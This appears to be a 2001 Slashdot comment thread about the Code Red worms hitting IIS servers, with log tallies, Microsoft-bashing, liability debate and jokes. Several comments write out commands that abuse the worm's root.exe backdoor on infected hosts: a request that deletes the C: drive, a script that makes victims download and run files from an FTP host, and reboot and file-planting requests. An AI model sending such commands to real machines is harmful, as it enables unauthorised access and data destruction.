I just got permission to put something up on my work's web page that allows us to track the number of hits by Code Red (and Code Red II) but I haven't had time to put anything so sophistocated together. Bravo.

Current Code Red Worm Hits Count

Mind releasing code/information on how you did that one?

On other fronts, one of my co-workers is informing me that he's getting hundreds of such hits on his boxen sitting on the COX@home network, most of them seem to be originating from other COX@home addresses. I did see some mention that there has been lots of COX activity. I wonder what's the reason for that.

Amerist A'Toll

Re:The Breaking Point

[Malcontent]

You can't sue MS (they are bigger then the govt prectically). But you can probably sue and company which uses IIS and stores your personal data. If that comapny was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
Everybody wins.

Re:Microsoft Internet Pollution - My Server Log!

[jeremyp]

There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.

Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.

Re:This will put a bandaid on the problem:

[Telek]

actually there isn't a "non executable" flag for windows.... changing the extension is good enough.

Wasted bandwidth

[peterprior]

Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software? This thing must have consumed quite a lot of bandwidth, and if you're on a "pay per mb" connection, its going to cost you a lot.

Re:Wasted bandwidth

[isorox]

I mistook the original poster as being a windows server. NO they dont, but the attacking computer's EULA will. You have sue them. Of course, you dont sue slashdot if your site gets slashdotted do you?

Re:Wasted bandwidth

[isorox]

Nope, look at your EULA

Re:Wasted bandwidth

[NetJunkie]

Sue your admin. They didn't patch it. Microsoft released a patch in time for the first wave of this.

You really don't want to start this..just wait until Linux is popular enough to attack. How many default Red Hat servers do you think are out there? A LOT. We had a couple of stock Red Hat 6.1/6.2 boxes at my current work when I started.

Re:Wasted bandwidth

[Velox_SwiftFox]

Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software?

Nope, look at your EULA

Microsoft's EULA prohibits me from suing them for bandwith charges for the stuff their crap throws at my Linux/Apache setup?

Wow, they must have better lawyers than I thought.

Re:Wasted bandwidth

[dbarclay10]

Well, the EULA still applies :) You couldn't sue Microsoft, but you could sue the companies whos servers are infected(and hence spamming your box).

MS has absolutely no liability(legally) in this particular instance. Personally, I think it's gross negligence on their part, and I think some *severe* measures are in order.

Quite frankly, I don't give a shit that they're a monopoly. My local telephone monopoly is *wonderful*. Very nice, very courtesous. As a business owner and a consumer, I'm very happy with them. But Microsoft is just plain mean and negligent.

Dave

Re:Wasted bandwidth

[einhverfr]

Actually, the patch was released in June after the overflow was discovered by eeye.com... Lousy admins did not apply the patch or read the advisory (MS01-033).

I do think that MS deserves some blame because they have made it insanely easy to administrate an NT box functionally by insanely hard to do so competently. The OS is user friendly but very obfuscatory (note that even apple never marketed Macintosh as a server, at least not until OS X-- they sold servers running Apple UNIX). How many questions on the MCSE exams covered planning for disaster recovery or planning for internet security (hint: less than one)? Those of us who prefer UNIX do so because it is easier to administrate properly though it requires more knowledge to do basic tasks... The learning curve is constant and does not get as steep as NT's does...

Microsoft also has a history of poor security programming. For example, the Microsoft implemtation of PPTP uses the users a hash of network password for the encryption key for the session. This does not necessarily make it easy to break into an account, but it does effectively prevent any forward security because your key will not change until your password does... I would not trust them with any critical information or production servers, and that includes IIS.

Not that it matters really-- of FreeBSD and Linux can gain enough dominance, they can effectively take the money out of the small server OS (fewer than 4 processors) and that would be a major blow to Microsoft and it would prevent them from being able to make billions off that industry...

Re:Wasted bandwidth

[MackE]

Now, I don't think I could sue Microsoft over this and win, but I'll be DAMNED if it's because of a EULA for a product I don't even have. IANAL, but I doubt if 'hold harmless' clauses are an absolute defense.

Re:Origin of Code Red?

[ether0]

"Code Red" is cherry flavored Mountain Dew

Re:The Breaking Point

[beable]

djbdns is an open source replacement. you get a cash award for finding vulnerabilities in it.

Big deal. You can't prove that something is secure that way. Suppose you worked out how to crack root using djbdns. Are you going to take the cash prize, or are you going to wait until you can get root on a bank's machine and get some REAL moola?

Does anybody know what the target will be for this version of Code Red Worm? It'd be pretty funny if it was microsoft.com.

Re:Someone needs to write

[siokaos]

No, sadly, it would be a very complicated algorithm to parse all the facets of the english language, and find similar ideas. I was using a recursive example, just as that, an example, not being serious.

Re:I cant believe...

[Telek]

folders get their dates updated when files in them get updated, so this is not necessarily a new installation...

One simple HTTP request that nukes C:

[Pilferer]

The following HTTP request will erase everything on the infected machine's C: drive, which prevents it from attacking more machines, and possibly makes the user consider installing Linux rather then reinstalling WinNT/2K:

http:// {infected ip here } /scripts/root.exe?/c%20del%20/Q%20/F%20/S%20c:\*.*

Yeah, I know, it's NASTY, but...

Re:One simple HTTP request that nukes C:

[CTho9305]

if you're going to nuke them, why not setup up apache? just set up whatever long bat file is required (using echo blah >file) and then run it... have it download linux, or get and install apache

Re:One simple HTTP request that nukes C:

This uncovers an NT problem: you can't erase a file that is in use. The del command will probably abort upon finding the first file that it can't delete.

I've done this before to myself.

Re:File download script

[Troed]

Using someone's public webserver is illegal?

You're sending GET requests ..

Re:this sucks

[raju1kabir]

what i don't look forward to is probably an increase in this kind of crap as XP rolls out with raw socket support.

What on earth does raw socket support have to do with anything discussed here? Do you even know what it means?

This will put a bandaid on the problem:

[Telek]

try this:

GET /scripts/root.exe?/c+echo+ren+root.exe+badrootexpl oit+>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+echo+echo+^>+root.exe+>>+fixm e.c md HTTP/1.0
GET /scripts/root.exe?/c+echo+attrib.exe+root.exe+%u00 2Br+>>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+echo+dir+>>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+type+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+fixme.cmd HTTP/1.0

this way it renames the old root.exe, creates a new dummy one, and write protects it so it can't be overwritten by a simple copy command.

Re:huge cable modem hits

[onepoint]

I'm having 2 to 4 alerts every minute from the @home network or road runner.

It's crazy.

onepoint

these will do..

[LinuxHam]

net stop iiswww

route delete 0.0.0.0

(the equivalent of) ifconfig eth0 down

and I saw something like 'iisreset /y' go by before..

They deserve it

[zexxxx]

Its really shoddy if different strains of a worm can use the same exploit over a couple of weeks. For the amount of money that is spent in trying to keep computers secure, this is insane.

I guess most of the hits i've taken are more from home users. Only God knows why anyone would need a server OS for personal use.

Good ol' linux!

Re:Code Red Infects Slashdot!

[Anne_Nonymous]

Would someone post an actual link to this please. Thx -Anne

Re:potential for something worse

[Unknown+Bovine+Group]

LOL

GET /SarahConnor.ida?XXXXXXXXXXXXXXX...

Microsoft to World: Dont blame us for code red!

[spike666]

an article pulled from the Phillipines Inquirer quotes a Microsoft rep (granted, hes just the phillipines head) as saying that "it is wrong to say that Microsoft software is inherently vulnerable to security threats"

the article is available on the Hoovernews website

Re:Try pulling the IP up in your browser

[cavemanf16]

I actually tried this in Konquerer a couple days ago. Didn't have any immediate results, but somehow www.rob.com managed to set a cookie on my Mandrake8 box, which I readily found out was most likely due to my trying to find CodeRed'ed servers that had hit me. Funny thing is, I never received the popup requesting me to allow the cookie when surfing for his IP, and I have Konq set to Ask Permission for every cookie placing attempt. Weird.

Re:Aural Feedback

[Brett+Viren]

Consider using the command

tail -f log | grep defalt.ida >crhits.log

in conjunction with the "select(2)" system call (available in Perl), for improved efficiecy.

Bandwidth wasted?

[mwillems]

Wasted? It's like airplane seats: once it's not used, it's gone forever. Not a renewable resource. If a particular pipe is 90% full as opposed to 10% full, there's very little difference.

So unless it caused noticable congestion it makes no difference in that respect.

How to be a nice guy

[Pilferer]

If you're a nice guy, try the following (or something similar) to let the victim know they're infected:

http:// {infected ip here } /scripts/root.exe?/c%20echo%20f>c:\windows\desktop \ warning%20you%20have%20the%20code%20red%202%20viru s%20your%20computer%20attacked%20mine%20please%20g et%20a%20virus%20scanner.txt

When the victim sees something along the lines of "You've got a virus, you attacked me, go clean your system up!" sitting on their *desktop* they'll * NOTICE * it!

If you try to run "delete root.exe" you'll get an access denied..

Re:How to be a nice guy

too bad winnt machines dont have a "c:\windows" directory. On NT4 try "c:\winnt\profiles\administrator\desktop" and on win2k and winxp try "c:\documents and settings\administrator\desktop" you could also replace administrator in both of those paths with "all users" so that it shows up on the desktop on all users on the system

Re:I'm sorely tempted . . .

[Phroggy]

I stand corrected. I got it to work on a different server. Only one, though; most of the rest I've tried don't seem to have root.exe installed.

Re:Aural Feedback

[d3jp_]

Great, you're making a sound on the newer Code Red variant... What about the old one? I'm still getting about a 4:1 ratio of original code red to anything else... If you don't have a web-server running, but STILL want to log Code Red, use websnarf... A perl implementation to log attempts to access port 80 [ or whatever port you want I guess... ] http://www.unixwiz.net/tools/websnarf.html Yes, it runs under ActivePerl too...

Re:The Whitehouse.gov lesson

[beable]

And now that whitehouse.gov has installed Linux, the Code Red Worm no longer exists, right? And everybody knows that Distributed Denial of Service attacks don't work against Linux boxes, right?

Mod that sucker back down.

Re:Sadmind/IIS unicode worm already did that

[BCoates]

Sorry, you're right about that. Different IIS vulnerability (ugh), same sort of backdoor installed.

Either way, someone who finds a wormed IIS should remember to blow away and reinstall the box (instead of just patching IIS and cleaning up the webroot), since either the vulnerability or the backdoor could have installed who-knows-what on it in the meantime...

--
Benjamin Coates

Re:Nasty as it gets?

[LinuxHam]

IANAL,BMSI (But my sister is - Stanford Law, at that!)

So I asked her if MS could be sued due to the poor quality of their software, and the millions of dollars spent restoring businesses to normal operations. She said that they absolutely cannot be sued for the resulting conditions based upon misuse of their product. Same goes for any product manufacturers.. gun, automobile, kitchen knives, whatever.

They would have to continue to produce software that was known to contain bugs and major security risks, and here's the key: never release any updates or patches to try to resolve the situation. You have to admit, they've release tons of patches this year alone. They *are* trying to resolve problems as they come up. At least a little bit.

Re:Repository of infected IP addressen

[BMIComp]

Well, right now a lot of people are sending their logs to Dshield, who then notify the owners of the infected machines. grep default.ida access_log* | mail -s 'APACHE' redalert@dshield.org

Re:Now that I've got access to hundreds of boxes

[Hilary+Rosen]

I get this. I think it means IIS is running on a desktop version of Windows (NT4WKS or W2KPro) rather than a server.

===

The page cannot be displayed

There are too many people accessing the Web site at this time.

---

Please try the following:

Click the Refresh button, or try again later.

Open the 65.29.102.77 home page, and then look for links to the information you want.

HTTP 403.9 - Access Forbidden: Too many users are connected

Internet Information Services

---

Technical Information (for support personnel)

Background:

This error can occur if the Web server is busy and cannot process your request due to heavy traffic.

More information:

Microsoft Support

Re:Origin of Code Red?

[jstockdale]

South Island, but no sorry, try the extreme sports capital of NZ ;) and no we don't get Mountain Dew here. We do however get Dr. Pepper imported from the States so go figure.

Re:My prediction...

[JimPooley]

Three more versions surely..

LLLLLL...
IIIII....
and
UUUUUU...

What's that spell!!!

Re:I'm sorely tempted . . .

[IdentityCrisis]

ummn, I think that in NT you have to change the number to hex meaning instead of 1 you'd use 0x1

How does codeRed infest?

[Umanity]

I understand that this worm exploits the buffer overflow bug in IIS. Has anybody disassembled the program to understand how it operates. If so, please contact me...

I have determined that if we could insert a payload on a codeRed terminator, we could shut down the infested machine by calling the winAPI function:

ExitWindowsEx(EWX_POWEROFF)

This should work, assuming the process has SE_SHUTDOWN_NAME priveleges. I don't have IIS, but I am looking at MSDN on a Win2000 machine now.

I would like to understand the payload, it seems like a sequence of unsigned integers. They occur just past the stack, so when the function exits it returns to the inserted code. If we could insert the call to ExitWindowsEx() we would be HOME FREE!

Contact me @ michaeluman@softwaremagic.net

Re:CmdrTaco runs Windows

[mpe]

I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)

Except that the strange HTTP requests it puts out cause problems with some embedded webservers...

Re:The Breaking Point

[Ridge2001]

Does anybody remember a few months ago when everybody around Slashdot was feeling sorry for themselves because it seemed that Open Source software was getting hard hit by security problems?

• sourceforge.com was hacked
• themes.org was hacked
• apache.org was hacked
• the ramen worm
• the lion worm
• the knark rootkit

Things were so bad that Microsoft felt cocky enough to make claim that open source software has "inherent security risks".

Well, you can quite rightly laugh at Mundie now for his audacity, but it's ridiculous to start calling for lawsuits against software makers. Do you really believe there is never going to be another exploit targeting open source software? Do you want the creators of that open source software to be sued too when that happens?

Microsoft is a big company, and it can afford lawsuits like that. But if, say, the creators of BIND were sued for an exploit, that would probably be the end of BIND. And it's unlikely anyone would be eager to write an open source replacement, with the threat of lawsuits looming over any potential open source project.

Re:huge cable modem hits

[Siberius]

Mine too has my ADSL modem light up like a christmas tree. Even with my computers unplugged the adsl light keeps flickering. Is there any way to stop this?

Re:CmdrTaco runs Windows

[M.+Silver]

Except that the strange HTTP requests it puts out cause problems with some embedded webservers

Yabbut that's *still* not "all of us," as with SirCam.

Though, interestingly enough, I haven't seen SirCam. I run a mailing list server, and usually I get a nice sampling of darn near everything caught in the spamtrap... I saw Melissa from a European subscriber way in the wee hours of the morning, which was handy since my then-employer needed a sample to feed to its mail filter. And I still see Snowhite once every couple of days. But no SirCam.

Not that I'm complaining, mind you...

Re:I'm sorely tempted . . .

[Magius_AR]

There is a way (I have it written down at home) to do this. I stumbled across it when looking for a way to coem up with a shortcut icon to doubleclick to shut down my machine (rather than the standard Start, Shutdown method). It involves using rundll32 with a specific command and some options (offhand, I can't remember what they are) And it works quite nicely too (tried it myself)...it pretty much just kills everything and shuts down (you don't get those annoying "waiting for task to end" boxes)

Magius_AR

Code Red Infects Slashdot!

[Mdog]

It's gotten to the editors! It's everywhere! It causes itself to be posted multiple times per day! Hide the women and children!

Re:Code Red Infects Slashdot!

[Kwelstr]

Microsoft is a bad neihbor, whose allowed their yard to fill with filth and trash, subjecting the people around them to the vermin and roaches that breed within their unkempt property. It is on this day that the internet will begin to sputter and fail in places due to the tremendous burdon Microsofts incompetence has placed upon it.
Microsoft's products spew pollution into the information space like a burning mountain of tires.

Yeah and the funny thing is, they may be doing it on porpose, seriously. Just check out the last Cringely article at PBS on this subject.
http://www.pbs.org/cringely/pulpit/pulpit20010802. html

Re:Code Red Infects Slashdot!

[cyberdonny]

> It is on or near this day that Microsoft's software became, without a doubt, a public nuisance to the internet.

I hate to defend Micro$oft, but at least in this instance, they are only a nuisance to themselves (and to their customers). Indeed, Code Red only infects IIS, not Apache nor any of the many other brands of Webservers. And please don't bring out that old canard of CodeRed eating bandwidth and bringing the Internet to a crawl: this one has been debunked here: the real reason for the July 10th slowdown was... a train wreck!

Re:Code Red Infects Slashdot!

[thrig]

Code Red has a nasty side effect of knocking over (the poorly written) embedded webservers in hardware devices, such as the HP 4000 or the Cisco 67* DSL router, so it's not just Microsoft products. See the "two birds with one stone" thread, recently featured on BugTraq.

I feel Microsoft products have been a public nuisance since they introduced the deplorable notion of active content in a document (word macro virus)-- forcing me to waste time installing anti-virus software to deal with the symptoms.

Re:Code Red Infects Slashdot!

[CodeRed]

I have been here a while my friend.

I think for my next amazing trick, I'll send a bit of news about Code Red from CodeRed.

Re:Code Red Infects Slashdot!

[IronChef]

Here are some of the sites that have tried to infect me. These servers all had live content when I last checked. Very humorous.

http://65.3.197.16/

http://65.3.145.164/ ('welcome to the all porshe page!' Hilarious, GeoCities quality web site.)

Most of the rest of the machines that hit me had IIS "under construction" signs up.

Re:Code Red Infects Slashdot!

[Umanity]

Notice that this article was written before the appearance of CR2, the more virulent version of Code Red. I too believed that the worm was "Overhyped" in the media. But as of yesterday, I saw a four-fold increase in the attacks from the worm. I think the new version could be quite a problem. I have been tracking down systems infecting others and calling the sysadmin. I think we need to pro-actively stop this thing by alerting sysadmins that their machines are compromised.

I have noticed that a lot of the recent hits have been coming from my Service Providers address space. And the frequency of attacks are increasing. On the 2nd of August I only got about 30 hits, about 1 every hour. On the 4th of August I got over 80 hits, thats about 4 hits an hour.

This thing is gaining momentum... Don't be foolish and underestimate it...

Re:Code Red Infects Slashdot!

[AstroJetson]

I'm not exactly sure what to look for, but I'm noticing a lot of entries in my system log like this:
Packet log: input DENY ppp0 PROTO=6 65.14.239.180:3281 [my IP]:80 L=48 S=0x00 I=29746 F=0x4000 T=118 SYN

That IP translates to cj40900-a.alex1.va.home.com. If I try to access it w/ a web browser I get:
The page cannot be displayed
There are too many people accessing the Web site at this time...clearly a MS error message due to the link to Microsoft Support at the bottom of the page.

nmap identifies the OS as Windows 2000 Pro RC1/W2K Advance Server Beta3

Is this CR? I'm guessing that it is.

Re:Code Red Infects Slashdot!

[MadAhab]

While it's sorta alarmist, it *could* be true. But Cringely provides his own Occam's razor right in the same article; Microsoft allows poor security because improving it would not increase their market share. No one chooses a Microsoft product on security criteria, and the few people who choose against it are the folks who have

The resistance to even installing support at the ISP level for a Microsoft networking protocol would be much larger than he accounts for. For one thing, I've seen ISPs belly flop on flash upgrades before. Now figure that such a protocol would have to be in place at every hop along the way. Even if it were encapsulated in TCP/IP, this would bring performance down and require at least the other end to use the protocol, and that's a pretty thin wedge.

Their chances of succeeding in such a takeover would be exceedingly poor, at least without legislative action, and Microsoft would come out a real loser in that kind of political battle in DC. The number of "all business is all right, all the time" nitwits in Washington can be easily calculated by counting bow ties, while Microsoft's enemies are many and not so easy to identify.

Cringely's actually a pretty smart guy, but he's wrong on this one.

Re:Code Red Infects Slashdot!

[No-op]

I'm on the RoadRunner network, and my little freebsd desktop has received 644 hits since august 1. 566 of those TODAY, on august 4th, almost completely consisting of the coderedII version.

of course this makes me regret linking /default.ida to a 500mb random text file :)

Re:Code Red Infects Slashdot!

[Anne_Nonymous]

Thank you. Also of interest to those with POS Cisco 675's is the following link on correcting the problem:

http://support.visi.com/dsl/codered.html

Finger of God

[LinuxHam]

Time the long-awaited "Finger of God" script. Fdisk 'em!

Eh...

[geggibus]

When will somebody modify the worm, so it downloads and install the patch.. then searches for other valnuerabel victims and infect them... ;)

/Geggibus "Ehh..."

File download script

[nebby]

(Copied from the other thread, for those who are working on a way to fix this worm)

I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.


#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository

# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory /pub/cr
DIR="%2fpub%2fcr"

echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80


I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore :)

Re:File download script

[Molina+the+Bofh]

> I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.

The idea is nice, the intention is louvable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

The argument that you're doing this for their own good is the same one that crackers use.
-"Oh, we're doing them a favour, showing their vulnerabilities."

Re:File download script

[nebby]

Yeah I realize that. I'm not doing anymore "work" on this, but I figured I might as well post it. I figure I painted myself red enough on one or two win2k cable modems for one lifetime now.

The intention isn't the same as crackers though, writing a script to patch and restart IIS not an in your face "showing their vulnerabilities" crack, it's basically a free-of-charge windows update complements of whoever runs the script. I'm not saying that it is legal, but it's definitely not a "ha ha I got rewt your windows box is insecure" crack. It a "I noticed your computer is insecure, I fixed it. Have a nice day, and don't let it happen again." crack.

If anyone actually sat and wrote a complex script to fix these computers, I *highly* doubt that a sane judge would pound the gavel on them, especially if the good they do is significant enough and measurable. (Personally, I would *love* to see someone outside of Microsoft do this before MS gets the chance to issue a fix and once again look like the good guys even though it's their original fuck up.)

Re:File download script

[elefantstn]

The idea is nice, the intention is louvable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

Are you sure? I mean, it's not like you're cracking into people's boxes randomly to do this; only computers that try to attack your Apache server are effected. Of course, thieves have successfully sued for unsafe property for injury themselves during attempted burglaries, so who knows...

Re:File download script

[Erasmus+Darwin]

I believe it would be considered illegal in most countries.

What if one were to change one's web server's main page to advertise an automated Code Red fixing service, conveniently located at http://www.example.com/default.ida?

I suppose it probably wouldn't hold up in court, but it'd still be amusing.

Re:File download script

[M.+Silver]

The idea is nice, the intention is louvable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

If it was initiated by their machine (that is, by the default.ida request), that might be questionable, though. Not that *I'd* want to test it out in court, but I wouldn't dismiss it out of hand.

Re:File download script

[Xemu]

Also, I was unable to figure out a way to get the machines to reboot or restart IIS

Rebooting a compromised IIS server is trivial, just add this to your script

(echo "GET /scripts/root.exe?/c+iisreset+/reboot HTTP/1.0\n\n\n\n" ; sleep 5) | telnet $1 80

or you could substitute iisreset/reboot with one iisreset/stop and one iisreset/start for less impact on the system.

Re:File download script

[Mike+Schiraldi]

or you could substitute iisreset/reboot with one iisreset/stop and one iisreset/start for less impact on the system

Um, if you stop the IIS server, how exactly are you going to send it a start command?

Re:File download script

[asackett]

Hmmm... If you connect to my box and request a file named foo.bar, and my box sends you a file named foo.bar, but it's not got the content that you expected, am I using your computer without your consent?

Re:File download script

[camusflage]

Uhhhh, Yeah. Tell it to Max Butler (aka Max Vision). He did the same thing for the bind worm, releasing a worm that fixed the hole. He's now doing 18 months with three years of probation, plus $60k in restitution.

Read here if you're still thinking of releasing this creature into the wild.

Re:File download script

[Javit]

Tell it to Max Butler (aka Max Vision). He did the same thing for the bind worm, releasing a worm that fixed the hole.

Butler's worm also left a backdoor on all the systems it "fixed." Hardly synonymous with nebby's intent. However, I do think releasing another worm to counter Code Red is a bad idea. It's likely that doing so would result in as much ill will as good for the author of the patching worm.

See this Wired article for more info about Butler's case.

-Javit

Re:File download script

[cyberwench]

I don't know... that might be the key to the whole thing. After all, their server requested the file. =)

Re:File download script

[Caspuh]

Ummm, MS released a fix for this over a month ago.

Re:File download script

[camusflage]

I suppose it probably wouldn't hold up in court, but it'd still be amusing.

Doesn't even hold up technologically, let alone in court.

In theory, it sounds good. You're ignoring that the infection comes from a malformed request, not response. To make it work, you'd need to take the IP issuing the request, and fire a request back at it containing your payload.

"Ummm, I was just seeing who was talking to me. I didn't know they were vulnerable!"

Re:File download script

[spectral]

forget another worm, just make a counter-attack, not a counter-worm. you're scanned. In retaliation, fix it. Self-defense argument anyone?

Re:File download script

[Erasmus+Darwin]

You're ignoring that the infection comes from a malformed request, not response.

Well, the argument is that the counter-attacker would be advertising a service which the Code Red worm then "requests".

A analogy might be to the telephone service providers that registered names like "I don't care", thereby inadvertently foisting their services upon someone who said that phrase for different reasons.

Similarly, the counter-attacker would be making a request to "/default.ida" the request means by which a machine can indicate that it desires to have the Code Red worm backdoor exploited on itself.

Overall, it's predicated on the notion of what indicates acceptance of conditions on the web. Is someone providing a controversial service responsible for determining, beyond a shadow of a doubt, that the person requesting a service really knows what they're doing? Or is it the fault of the entity generating the request (in this case, the Code Red worm itself)? I suspect the answer's somewhere in the middle, but I have no clue on exactly where it would lie.

Re:File download script

[Dr.+A.+van+Code]

One thing you're missing, though, is that the people who are still infected by this thing are people who aren't paying any attention to what is going on. Not watching the news and/or don't even know that they're running IIS.

Therefore, you couldn't get in trouble for fixing their machines without their permission because they'd never even realize you had done so!

Cheers!

Is this just the beginning?

[StarTux]

What worries me is if this is just the beginning in a wave of attacks.

As everyone notices is that it is being directed against the following:

Microsoft users using e-mail.
Microsoft servers on the Internet.

Sircam is annoying to say the least as that attacks lack of security on the Windows platform and the lack of knowledge of plenty of Windows users.

Code Red mk1 and mk2 attack the lack of security on IIS (patch is available, MS patches known to cause other issues, we hear it) and then spread like wildfire.

StarTux
PS Microsoft is not very proffesional in its conduct IMHO. Its not all about money and power, its about providing the best possible software/service for your customers...

Re:Anyone still consider this a Microsoft problem?

[forgeeks]

sounds great, but the problem is you would get in so much trouble for that.

Not a bug

[Mike+Schiraldi]

I've always wanted to be able to telnet into my Windows box. Where can i get this virus?

Re:Not a bug

[Delrin]

The only command that will work though is winipcfg or ipconfig for those NT ppl. ;-)

Re:Not a bug

[Mike+Schiraldi]

Just put your box on the net and wait.

Oh, Windows Update is using Push technology now?

Re:Not a bug

[imipak]

of course, you know you can run your standard sshd, as well as VNC (hey, why not tunnel the former out via the latter?)

The tempation to dig some IPs from the logs and go for a wee look around at open machines is pretty intense (not that I'll be giving in, I hasten to add - bad ethics innit?) ... and it's at times like this I wish I'd gone to the effort of finding a commandline MTA for NT, though; it's a real pain manually looking up the POC & mailing them...

Re:Not a bug

[Umanity]

Duh!

I just downloaded a very good ssh implementation for Windows2000. Now I can ssh to a shell on the W2000 box and build my projects without having to spin-around and use that Useless GUI included with Windows2000.

Good luck,

Re:Not a bug

[ScumBiker]

Which SSH implementation did you go for? I wouldn't mind trying it myself, since the damn State^H^H^H^H^H^H^H^H my employer has standardized on M$ shit. Oh well, it pays the bills.

BTW, I'm up to 130 CR2 hits on my name/HTTP server too. Just to stay on topic, donchaknow.

Re:Not a bug

[ergo98]

How does sit "barely qualify"? NT 4 had a telnet server in the resource kit, and in the UNIX pack, as well as a good selection of third-party telnet servers.

Personally I use netmeeting desktop sharing though: Works beautifully, and it lets me use graphical administration tools as well.

Yup, sircam is more annoying

[PsionicMan]

My employer, a reasonably computer proficient person, got hit by sircam. Cost him 16 hours of productivity during a period when time was particularly valuable...

Re:Yup, sircam is more annoying

[Malcontent]

Is he still using it? The answer to that question really determines weather or not he is a dufus.

Re:Yup, sircam is more annoying

[mantis71]

How proficient could this guy possibly be if sircam cost him 16 hours? I am the MIS at a small software company and it took myself and my system admin no more than 3 hours to clean every workstation and server on the entire network. I will tell you, though, that these little punks writing these things need to be dragged into the street and publicly shot.

Re:Yup, sircam is more annoying

[NonSequor]

Is he still using it? The answer to that question really determines weather...

That's pretty damned amazing. To think that weather can be determined by a simple yes or no question.

Re:Yup, sircam is more annoying

[konmaskisin]

I will tell you, though, that these little punks writing these things need to be dragged into the street and publicly shot

Me oh my. And what fate would you reserve to the designers of programs that enable this silliness? It's sort of odd how Microsoft seems to get off the hook *completely* on this ...

Re:Aural Feedback

[bmoore]

Change your 'grep XXXXXXXXXXXXXXX' to 'grep default.ida' That way, you can get all the different variants. The 'X's are used by Code Red II, not the initial one.

Re:affects every email user?

[gimpboy]

SirCam spreads in an attached EXE

so would this be an elf binary? if not i doubt it will run on my computer.

Re:The Breaking Point

[Malcontent]

Don't hold your breath. You think a post critisizing MS will get modded up? On slashdot? Yea right! The MS posse will soon mod it down.

Origin of Code Red?

[jstockdale]

Just curious about the "highly caffinated soft-drink" popular among programmers that Code Red was named after. My first guess was Coca-Cola but someone also pointed out that it could be Red Bull. I'll stay with my original guess, due to the red cans and abundance of Coke wherever I see programmers. The only question is whether it qualifies as highly caffinated. On the other hand, Red Bull has its merit as well, being, well, "Red." However, I do debate whether or not Red Bull is highly popular, since its expensive as hell, and alot of the programmers I've met couldn't afford Red Bull on their non-existant saleries Anyway ... I'd be anxious to hear what insight the slashdot community can give on this matter. *looks around table*
damn that reminds me ... i gotta throw away some of these coke cans ;)

Re:Origin of Code Red?

[jstockdale]

Thanks alot guys ... never would have figured that out. In New Zealand we don't even have Mountain Dew, let alone Mountain Dew: Code Red. Just to qualify my lack of knowledge over this matter. ;) Thanks

Re:Origin of Code Red?

[Yorrike]

Where abouts in New Zealand do you live?! I'm venturing to say a locked shed, under a bolder, in a cave, in the South Island.

I'm sitting here, right now, drinking a can of Moutain Dew with the following words on the label: "Bottled in the North Shore, Auckland, New Zealand".

...........What more can I say?

Re:I'm sorely tempted . . .

[Eric+S.+Smith]

What about cable and DSL users? Unless they have static IPs (rare in my part of the world), won't they be using DHCP?

Hoax

[krokodil]

Try this:

http://www.slashdot.org/scritpts/cmd.exe

A virus that patches systems...

[TheMCP]

Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that? :)

How do you think viruses were invented?

Re:this sucks

[aechols]

it doesnt have to be iis, and it doesnt have to be taking control of something. on the other hand, are you willing to bet that it cant be done? how many "secure" ms products (or not even ms products) have flaws like this that appear every once in a while when somebody stumbles across it? too many. code red is achieved within the legal range of values in the protocols involved. without raw sockets, its usually just square pegs in square holes. with raw sockets, you can go into things that cant be done legally according to protocol, so now you can stuff round, triangular, and star shaped pegs through the square hole. things will break. its like trying to run a car on water, or trying to withdraw cash from an atm with the ace of spades. the car wont start, and the atm will reject the card. yes, raw sockets are available to *nix machines, and yes its in w2k, but these things arent widespread among regular people and outside businesses.

Re:Ummm, no actuall

[jgp]

I don't care what anyone says, cooking an
animal alive is just fucking sadistic.

Re:Who needs Telnet

[pest]

well, what i'm thinking that you should actualy do is something like: /scripts/root.exe?/c+move+root.exe+c:\winnt\profil es\default\you_got_code_red_you_silly_bastard.exe

IIS really means...

[Shingis]

Insufficient Internet Security

Repository of infected IP addressen

[steveoc]

